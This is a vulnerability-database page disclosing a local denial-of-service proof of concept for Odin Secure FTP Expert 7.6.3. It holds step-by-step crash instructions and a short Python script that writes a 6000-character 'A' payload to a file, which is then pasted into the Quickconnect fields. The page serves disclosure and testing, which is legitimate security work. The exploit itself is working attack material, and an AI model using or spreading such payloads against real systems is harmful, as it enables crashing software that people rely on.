Odin Secure FTP Expert 7.6.3 Denial of Service

2020.02.25
Credit: Berat Isler
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title : Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC) # Exploit Author : Berat Isler # Date : 2020-02-25 # Vendor Homepage : https://odin-secure-ftp-expert.jaleco.com/ # Software Link Download : http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3 # Version : Odin Secure FTP Expert 7.6.3 # Tested on : Windows 7 32-bit # First step , run exploit script, it will generate a new file with the name "bune.txt" # Then start Odin Secure FTP application and find the "connect" tab . After that you can click Quickconnect site tab. # After that paste the content of "bune.txt" in to the all fields like this --> "AAAAAA" than click connect button # Application will be crash . This is the generated payload code : #!/usr/bin/python bune = "A" * 6000 payload = bune try: f=open("bune.txt","w") print "[+] Creating %s bytes payload generated .. .. .." %len(payload) f.write(payload) f.close() print "[+] File created " except: print "File cannot be created"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top